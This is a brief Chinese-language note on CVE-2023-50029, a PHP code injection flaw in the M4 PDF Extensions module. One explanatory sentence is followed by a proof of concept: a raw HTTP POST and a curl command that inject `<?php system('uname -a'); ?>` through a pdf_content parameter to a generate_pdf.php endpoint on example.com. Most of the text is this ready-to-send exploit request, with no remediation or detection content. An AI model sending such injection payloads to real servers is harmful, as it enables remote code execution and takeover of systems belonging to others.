CVE-2023-50029 是 M4 PDF Extensions 模块中的一个 PHP 注入漏洞。该漏洞允许攻击者在服务器上注入并执行任意 PHP 代码,从而完全控制目标系统。问题在于对输入的验证不当,使得恶意代码能够通过用户参数传入。
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"